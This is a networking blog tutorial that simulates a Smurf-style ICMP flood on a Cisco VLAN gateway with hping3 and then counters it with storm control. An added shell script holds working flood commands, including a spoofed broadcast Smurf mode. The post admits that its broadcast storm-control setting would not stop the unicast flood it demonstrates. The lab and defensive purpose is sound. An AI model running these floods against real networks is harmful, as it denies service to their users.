Friday, August 23, 2013

Secure the virtualized interface against SMURF attack

Storm control against simulated Smurf attack on a Vlan


Cisco L3 switches have a useful inter-VLAN routing capability that lets us segment traffic and route between the segments, which is common in production environments. For a small example, we create a test VLAN (the "smurf" VLAN) for a group of application developers. The people in the app development department of an enterprise use the VLAN SVI IP address as their default gateway for Internet access and server resources. It is a /24 network created for this purpose only. At the access layer the relevant switch ports are placed in that VLAN (int fa0/9 followed by switchport access vlan 999).

L3SW#sh running-config interface vlan 999
!
interface Vlan999
 description SMURF_SVI
 ip address 100.100.99.1 255.255.255.0
end

Next we give the client interface (in this case a Windows box) an address in that subnet, with the SVI address as its default gateway, so that the SVI we just created is the target of the attack and the client is where we observe the effect.


To simulate a Smurf-style attack I use the hping3 security tool on a virtualized Linux box. To flood the gateway of the VLAN called SMURF_SVI, I start an ICMP echo flood from the attacker and follow the traffic that comes back in reply.



As we can see from the hping3 output (the packet counter highlighted in red in the screenshot), hping3 has flooded the default-gateway address of the SVI with a very large number of packets.
In a worse-case scenario I could aim the same flood at the subnet's broadcast address instead, which is what a real Smurf attack does; that would drain even more resources on the router, so I did not do it here. Now let us look at what a user sitting behind a PC in the VLAN is experiencing.


Voila, we get no reply from our default gateway. The packets flooded at the SVI have completely denied service to the VLAN: the router had to answer so many ICMP echo requests that it could no longer keep up with legitimate ones. Imagine this on a production VLAN with 1000 users; it could mean serious damage!
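The following script is an added example, not part of the original post, that packages the experiment above: the hping3 unicast ICMP flood against the SVI as run on the attacker, the true Smurf variant (spoofed source, subnet broadcast as destination) as an optional mode, and a small watcher that measures packet loss to the gateway from a second Linux host in the same VLAN and reports when service is effectively denied. Everything is hypothetical lab configuration: the gateway 100.100.99.1 and the assumed broadcast address 100.100.99.255 are taken from the post's /24, the watcher expects Linux iputils ping rather than the Windows client the post used, and the 50% loss threshold is an arbitrary choice. Run it only in an isolated lab.

```shell
#!/bin/sh
# Added example (not from the original post): reproduce the ICMP flood from the
# post and measure its effect on gateway reachability from a second host.
# Assumed lab values: SVI 100.100.99.1/24 (from the post), broadcast 100.100.99.255
# (assumed), hping3 installed on the attacker, iputils ping on the watcher, run as root.

GW="${GW:-100.100.99.1}"            # SVI address from the post
BCAST="${BCAST:-100.100.99.255}"    # directed broadcast of the /24 (assumed)

# What the post actually does: an ICMP echo flood aimed at the SVI's own address.
# --icmp selects ICMP echo, --flood sends as fast as possible without waiting.
flood_unicast() {
    hping3 --icmp --flood "$GW"
}

# True Smurf variant: echo requests to the subnet broadcast with the victim's
# address spoofed as the source, so every host answering the broadcast floods the
# victim. This only works where directed broadcasts are forwarded, which IOS
# disables by default since 12.0 (no ip directed-broadcast). Isolated lab only.
flood_smurf() {
    victim="${1:?victim address required}"
    hping3 --icmp --flood --spoof "$victim" "$BCAST"
}

# Extract the packet-loss percentage from an iputils ping summary line such as
# "10 packets transmitted, 3 received, 70% packet loss, time 9012ms".
parse_loss() {
    printf '%s\n' "$1" | sed -n 's/.*, \([0-9][0-9]*\)% packet loss.*/\1/p'
}

# Treat loss above the threshold (default 50%) as denial of service to the gateway.
is_denied() {
    loss="$1"
    threshold="${2:-50}"
    [ "$loss" -gt "$threshold" ]
}

# One reachability sample: 10 probes, 1 s timeout each (Linux iputils ping).
measure_loss() {
    summary=$(ping -c 10 -W 1 "$GW" 2>/dev/null | grep 'packet loss')
    parse_loss "$summary"
}

# Run on the watcher host while the flood is active; exits 1 when denied.
watch_gateway() {
    loss=$(measure_loss)
    loss="${loss:-100}"    # no summary at all means nothing got through
    if is_denied "$loss"; then
        echo "gateway $GW: ${loss}% loss -> DENIED"
        return 1
    fi
    echo "gateway $GW: ${loss}% loss -> ok"
}

# Dispatch only when an argument is given, so the file can also be sourced.
if [ $# -gt 0 ]; then
    case "$1" in
        flood) flood_unicast ;;
        smurf) flood_smurf "${2:-}" ;;
        watch) watch_gateway ;;
        *) echo "usage: $0 flood | smurf <victim> | watch" >&2; exit 2 ;;
    esac
fi
```

Run `sh smurf-lab.sh flood` on the attacker and `sh smurf-lab.sh watch` on the second host; once storm control on the attacker's access port errdisables it, the watcher goes back to reporting ok. The Windows client from the post prints its loss summary in a different format, which is why the watcher assumes a Linux host.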

There is a security mechanism we can use against this, in our case Cisco interface storm control.
Only a simple configuration is needed on the access port of the attacking host.

Switch(config)# interface fa1/1
Switch(config-if)# storm-control broadcast level 50
Switch(config-if)# storm-control action shutdown

When I start the flood again, storm control watches the broadcast traffic on the port until it reaches the threshold of 50% of the port's bandwidth, then shuts the port down (errdisable). Instead of shutting the port down we could choose the trap action, which sends an SNMP trap and keeps forwarding, or add a packet filter; that is left to our choice. One caveat a practitioner should keep in mind: the broadcast level counts broadcast frames only, so a flood aimed at the SVI's unicast address, like the one shown above, is only caught if a unicast level is configured on the same port as well, and the true Smurf variant relies on directed-broadcast forwarding, which should stay disabled on the SVI. Either way, on the other PC we can now see that the ping traffic keeps running fine, without damage to the company resources.


Traffic control matters on inside and outside interfaces alike, in both service-provider and enterprise scenarios. We have seen that when such security features are not applied, a simple flood can compromise a complete network segment.

Feel free to comment!

